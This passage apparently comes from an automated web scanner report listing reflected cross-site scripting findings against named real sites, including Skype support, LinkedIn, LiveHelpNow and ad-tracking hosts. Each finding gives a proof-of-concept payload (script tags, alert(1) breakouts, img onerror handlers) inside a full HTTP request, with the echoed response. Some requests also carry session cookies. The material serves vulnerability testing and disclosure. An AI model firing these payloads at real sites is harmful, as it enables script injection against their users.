KIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=19240&campId=161441&b6942"-alert(1)-"91db8ff3473=1",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsp73dy6"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log
...[SNIP]...

3.108. http://pixel.adsafeprotected.com/jspix [pubId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f03b4"-alert(1)-"37599c03060 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=19240f03b4"-alert(1)-"37599c03060&campId=161441 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=29645411B817F05049B7EF8C6DEFE954; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:54 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3D
...[SNIP]...
g%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=19240f03b4"-alert(1)-"37599c03060&campId=161441",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   asid : "gsp73dmn"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"inf
...[SNIP]...

3.109. https://support.skype.com/en-us/glossary [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/glossary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bffb0"><script>alert(1)</script>b13866784b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/glossary?bffb0"><script>alert(1)</script>b13866784b5=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:52 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 68011


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="e
...[SNIP]...
<input type="hidden" name="context" value="/glossary.do?bffb0"><script>alert(1)</script>b13866784b5=1"/>
...[SNIP]...

3.110. https://support.skype.com/en-us/search.form [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/search.form

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1fe"><script>alert(1)</script>0e4d33b11c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/search.form?5e1fe"><script>alert(1)</script>0e4d33b11c6=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:36:57 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en
...[SNIP]...
<input type="hidden" name="context" value="/search.form.do?5e1fe"><script>alert(1)</script>0e4d33b11c6=1"/>
...[SNIP]...

3.111. https://support.skype.com/en-us/search_first/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/search_first/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eda5"><script>alert(1)</script>523a4c9c01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/search_first/?2eda5"><script>alert(1)</script>523a4c9c01=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:50 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43136


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us"
...[SNIP]...
<input type="hidden" name="context" value="/searchFirst.do?2eda5"><script>alert(1)</script>523a4c9c01=1"/>
...[SNIP]...

3.112. https://support.skype.com/en/faqFeedback.form [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faqFeedback.form

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd92"><script>alert(1)</script>b2c781f336 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/faqFeedback.form?1dd92"><script>alert(1)</script>b2c781f336=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:33:03 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 42398


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" name="context" value="/faqFeedback.form.do?1dd92"><script>alert(1)</script>b2c781f336=1"/>
...[SNIP]...

3.113. https://support.skype.com/en/glossary [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/glossary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc416"><script>alert(1)</script>d582ea7c7f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/glossary?bc416"><script>alert(1)</script>d582ea7c7f7=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:32 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 67106


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<input type="hidden" name="context" value="/glossary.do?bc416"><script>alert(1)</script>d582ea7c7f7=1"/>
...[SNIP]...

3.114. https://support.skype.com/en/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5e9a"><script>alert(1)</script>ccb5065965f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/search?q=xss&e5e9a"><script>alert(1)</script>ccb5065965f=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: support.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; JSESSIONID=C51B9013C862C1913F4926F5DFFB3B93; skypeSessionId=C51B9013C862C1913F4926F5DFFB3B93

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:58 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Content-Length: 42591
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan
...[SNIP]...
<input type="hidden" name="context" value="/search.do?q=xss&e5e9a"><script>alert(1)</script>ccb5065965f=1"/>
...[SNIP]...

3.115. https://support.skype.com/en/search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/search

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eacf1"><script>alert(1)</script>f803bab4b3d was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/search?q=xsseacf1"><script>alert(1)</script>f803bab4b3d HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: support.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; JSESSIONID=C51B9013C862C1913F4926F5DFFB3B93; skypeSessionId=C51B9013C862C1913F4926F5DFFB3B93

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:14 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Content-Length: 51205
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan
...[SNIP]...
<input type="hidden" name="context" value="/search.do?q=xsseacf1"><script>alert(1)</script>f803bab4b3d"/>
...[SNIP]...

3.116. https://support.skype.com/en/search.form [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/search.form

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fb68"><script>alert(1)</script>87e00cca4aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/search.form?7fb68"><script>alert(1)</script>87e00cca4aa=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:33:06 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 42394


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" name="context" value="/search.form.do?7fb68"><script>alert(1)</script>87e00cca4aa=1"/>
...[SNIP]...

3.117. https://support.skype.com/en/support_selection_after_search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/support_selection_after_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d66"><script>alert(1)</script>825d2dc978e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/support_selection_after_search?33d66"><script>alert(1)</script>825d2dc978e=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:33:04 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 42410


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" name="context" value="/supportSelectionAfterSearch.do?33d66"><script>alert(1)</script>825d2dc978e=1"/>
...[SNIP]...

3.118. https://support.skype.com/en/tips [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/tips

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8243"><script>alert(1)</script>1574cf5533 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/tips?b8243"><script>alert(1)</script>1574cf5533=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:16 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 44071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<input type="hidden" name="context" value="/tipsTricks.do?b8243"><script>alert(1)</script>1574cf5533=1"/>
...[SNIP]...

3.119. http://trk.etrigue.com/track.php [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.etrigue.com
Path:   /track.php

Issue detail

The value of the a request parameter is copied into the HTML document as plain text between tags. The payload b9dd3<script>alert(1)</script>d4467b383d0 was submitted in the a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /track.php?ie=1&a1017=&b1017=WzYzMzMxLC0xLC0xLC0xLC0xLDEwNzY2NiwzMDM3MTdd&a1017exit=1315153270&a=1017b9dd3<script>alert(1)</script>d4467b383d0&c=5&t=1315153325093 HTTP/1.1
Host: trk.etrigue.com
Proxy-Connection: keep-alive
Referer: http://www.radware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: b1017=WzYzMzMxLC0xLC0xLC0xLC0xLDEwNzY2NiwzMDM3MTdd; a1017exit=1315153270

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
Set-Cookie: b1017b9dd3<script>alert(1)</script>d4467b383d0=deleted; expires=Sat, 04-Sep-2010 21:18:18 GMT; path=/
Set-Cookie: a1017b9dd3<script>alert(1)</script>d4467b383d0=deleted; expires=Sat, 04-Sep-2010 21:18:18 GMT; path=/
Set-Cookie: a1017b9dd3<script>alert(1)</script>d4467b383d0exit=1315171099; expires=Wed, 01-Feb-2012 21:18:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 21:18:19 GMT
Content-Length: 370

etrigueDCB1017b9dd3<script>alert(1)</script>d4467b383d0({"name":"b1017b9dd3<script>alert(1)<\/script>d4467b383d0"});etrigueDCB1017b9dd3<script>alert(1)</script>d4467b383d0({"name":"a1017b9dd3<script>a
...[SNIP]...

3.120. http://www.lijit.com/delivery/fp [n parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/fp

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e697"%3balert(1)//74392895200 was submitted in the n parameter. This input was echoed as 6e697";alert(1)//74392895200 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/fp?u=w3schools&z=128348&n=16e697"%3balert(1)//74392895200 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.4725153
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:24 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n10 ( lax-agg-n38), ms lax-agg-n38 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Mon, 05 Sep 2011 04:31:24 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 14967

function LjtAds_ReportError(errorMsg, except){
   try{
       errorMsg = "[Ads JS] "+ errorMsg
       try{
           errorMsg += " - "+ except.message
       } catch(e){}
       errorMsg = encodeURIComponent(errorMsg);
       
       var s
...[SNIP]...
Time String', e);
       return "00:00:00";
   }
}

try{
   // Settings: Change these values on a per user basis
   var lwp_ad_username = "w3schools";
   var lwp_ad_zoneid = ljt_getZoneID();
   var lwp_ad_numads = "16e697";alert(1)//74392895200";
   var lwp_ad_premium = "1";// or 0 for non-premium ad
   var lwp_ad_eleid = "lijit_region_128348";
   var lwp_method = "regex";
   var lwp_referring_search = getReferringSearch(document.referrer);
   
   var l
...[SNIP]...

3.121. http://www.linkedin.com/countserv/count/share [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 3ba89<img%20src%3da%20onerror%3dalert(1)>a71b4125463 was submitted in the url parameter. This input was echoed as 3ba89<img src=a onerror=alert(1)>a71b4125463 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424053111904900904576549933849920392.html%3Fmod%3Dwsj_share_in_bot3ba89<img%20src%3da%20onerror%3dalert(1)>a71b4125463 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 16:17:33 GMT
Content-Length: 195

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/online.wsj.com\/article\/SB10001424053111904900904576549933849920392.html?mod=wsj_share_in_bot3ba89<img src=a onerror=alert(1)>a71b4125463"});

3.122. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ba0fc%3balert(1)//dee046ad40a was submitted in the lhnid parameter. This input was echoed as ba0fc;alert(1)//dee046ad40a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288ba0fc%3balert(1)//dee046ad40a&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 16:18:23 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 10002


var lhnTrack='f';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnl
...[SNIP]...
ion.protocol=='https:' || (typeof lhnJsHost !='undefined' && lhnJsHost == "https://"))
   {
       window.open('https://www.livehelpnow.net/lhn/livechatvisitor.aspx?zzwindow=' + lhnwindow + '&lhnid=' + 1288ba0fc;alert(1)//dee046ad40a + '&d=' + 0,'lhnchat','left=' + wleft + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=' + sScrollbars + ',copyhistory=no,resizable=yes'
...[SNIP]...

3.123. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c53a"%3balert(1)//9f46c8341f8 was submitted in the lhnid parameter. This input was echoed as 2c53a";alert(1)//9f46c8341f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=12882c53a"%3balert(1)//9f46c8341f8&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 16:18:23 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 10012


var lhnTrack='f';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnl
...[SNIP]...
<img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=50.23.123.106|12882c53a";alert(1)//9f46c8341f8|9/4/2011 12:18:23 PM' />
...[SNIP]...

3.124. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66e04'%3balert(1)//c592964d139 was submitted in the t parameter. This input was echoed as 66e04';alert(1)//c592964d139 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f66e04'%3balert(1)//c592964d139 HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
